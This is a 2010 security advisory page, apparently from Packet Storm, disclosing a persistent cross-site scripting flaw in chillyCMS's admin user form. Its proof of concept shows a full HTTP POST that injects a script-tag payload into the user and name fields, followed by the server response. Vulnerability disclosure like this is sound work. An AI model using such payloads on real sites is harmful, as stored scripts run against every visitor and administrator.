what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Chilly CMS Cross Site Scripting

Chilly CMS Cross Site Scripting
Posted Mar 16, 2010
Authored by Pratul Agrawal

Chilly CMS suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 11456c3f691066f83e616c7e988e2151af0a9c2080155df90dba3da4b68c8219

Chilly CMS Cross Site Scripting

Change Mirror Download
                                     =======================================================================

chillyCMS Persistent XSS Vulnerability

=======================================================================





# Vulnerability found in- Admin module

# email Pratulag@yahoo.com

# company aksitservices

# Credit by Pratul Agrawal

# Software chillyCMS

# Site p4ge http://www.opensourcecms.com/demo/2/292/chillyCMS/

# Category CMS / Portals

# Plateform php



# Proof of concept #

Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php


In ADD LINKS Field provide the malicious script to store in the Database.



=======================================================================
Request -
=======================================================================
POST /chillycms/admin/usersgroups.site.php HTTP/1.1
Host: demo.opensourcecms.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://demo.opensourcecms.com/chillycms/admin/userform.site.php
Cookie: __utma=87180614.1562082400.1268211497.1268727582.1268736168.10; __utmz=87180614.1268727582.9.6.utmcsr=php.opensourcecms.com|utmccn=(referral)|utmcmd=referral|utmcct=/scripts/details.php; __utmc=87180614; sid=c619059e8ecb02bfd5013f4cffe9f23f; PHPSESSID=d99927af4737c0c6df62d8f28bb1219a; CMSSESSID15baf25f=98ecec19a538065e285d7837054c7df9; ccc_lang=en; __utmb=87180614.6.10.1268736168; CCC_UID=c4ca4238a0b923820dcc509a6f75849b; CCC_CODE=7839a866ba37a8a0e8dbd669545b57d9
Content-Length: 154

user="><script>alert(123)</script>&name="><script>alert(123)</script>&pw=master&pw2=master&email=master%40yahoo.com&gids%5B%5D=2&status=1&language=en&getnewsletter=1&myaction=new&action=updateuser&id=

=======================================================================
=======================================================================
Response-
=======================================================================
HTTP/1.1 200 OK
Date: Tue, 16 Mar 2010 11:53:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6337
Content-Type: text/html




=======================================================================


After completion Just Refres the page and the malicious script get executed again and again.


#If you have any questions, comments, or concerns, feel free to contact me.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close